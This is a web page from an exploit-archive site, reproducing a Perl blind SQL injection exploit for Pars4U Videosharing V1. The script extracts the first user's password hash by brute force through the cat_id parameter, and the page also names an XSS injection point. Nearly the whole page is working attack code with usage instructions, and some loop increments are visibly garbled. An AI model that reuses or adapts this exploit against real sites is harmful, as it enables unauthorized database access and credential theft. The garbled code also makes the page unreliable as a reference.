手机
当前位置:查字典教程网 >网络安全 >Exploit >Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit
Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit
摘要:#!/usr/bin/perluseLWP::UserAgent;useGetopt::Long;if(!$ARGV[1]){print"n...

#!/usr/bin/perl

use LWP::UserAgent;

use Getopt::Long;

if(!$ARGV[1])

{

print " n";

print " ################## VIVA ISLAME VIVA ISLAME ####################n";

print " ################## VIVA ISLAME VIVA ISLAME ####################n";

print " ## ##n";

print " ## Pars4u Videosharing V1 Blind SQL Injection Exploit ##n";

print " ## ##n";

print " ## ( categories_portal.php cat_id ) ##n";

print " ## http://pars4u.com/videosharing.html ##n";

print " ## ##n";

print " ## Author: Mr.SQL -(:: SYRIAN HACKERS ::)- ##n";

print " ## EMAIL : SQL(at)HOTMAIL.IT ##n";

print " ## HOME : WwW.PaL-HaCkEr.CoM ##n";

print " ## ##n";

print " ## -((:: !GrE3E3E3E3E3ETZz! ::))- ##n";

print " ## ##n";

print " ## - HaCkEr_EGy - His0k4 - Dark MaSTer - MoHaMaD AL 3rab - ##n";

print " ## - Milw0rM - Ghost Hacker - ##n";

print " ## ##n";

print " ## <<>> MuSliMs HaCkErS <<>> ##n";

print " ## ##n";

print " ## Usage : perl exploit.pl host ##n";

print " ## Example: perl exploit.pl www.host.com / -d 10 ##n";

print " ## ##n";

print " ## Options: ##n";

print " ## -d valid cat_id value ##n";

print " ###############################################################n";

print " ###############################################################n";

exit;

}

my $host = $ARGV[0];

my $cat_id = $ARGV[2];

my %options = ();

GetOptions(%options, "u=i", "p=s", "d=i");

print "[~] Exploiting...n";

if($options{"u"})

{

$cat_id = $options{"u"};

}

if($options{"d"})

{

$cat_id = $options{"d"};

}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i )

{

my $f = 0;

my $h = 48;

while(!$f && $h <= 57)

{

if(istrue2($host, $path, $cat_id, $i, $h))

{

$f = 1;

syswrite(STDOUT, chr($h), 1);

}

$h ;

}

if(!$f)

{

$h = 97;

while(!$f && $h <= 122)

{

if(istrue2($host, $cat_id, $i, $h))

{

$f = 1;

syswrite(STDOUT, chr($h), 1);

}

$h ;

}

}

}

print "n[~] Exploiting donen";

sub istrue2

{

my $host = shift;

my $cat_id = shift;

my $i = shift;

my $h = shift; my $ua = LWP::UserAgent->new;

my $query = "http://".$host."categories_portal.php?cat_id=".$cat_id." and (SUBSTRING((SELECT password FROM users LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; if($cat_id{"p"})

{

$ua->proxy('http', "http://".$cat_id{"p"});

} my $resp = $ua->get($query);

my $content = $resp->content;

my $regexp = "1&cat_a"; if($content =~ /$regexp/)

{

return 1;

}

else

{

return 0;

}

} #######################

##

##-[[ XSS ]]-

## www.Target.com/members.php?PageNo= [[ XSS ]]

##

#######################

【Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit】相关文章:

fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (php)

Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit

WebCMS Portal Edition (id) Remote SQL Injection Vulnerability

Yahoo Messenger 8.1 ActiveX Remote Denial of Service Exploit

TGS CMS 0.3.2r2 Remote Code Execution Exploit

Wordpress 2.6.1 (SQL Column Truncation) Admin Takeover Exploit

Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit

Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit

IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit

Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit

精品推荐
分类导航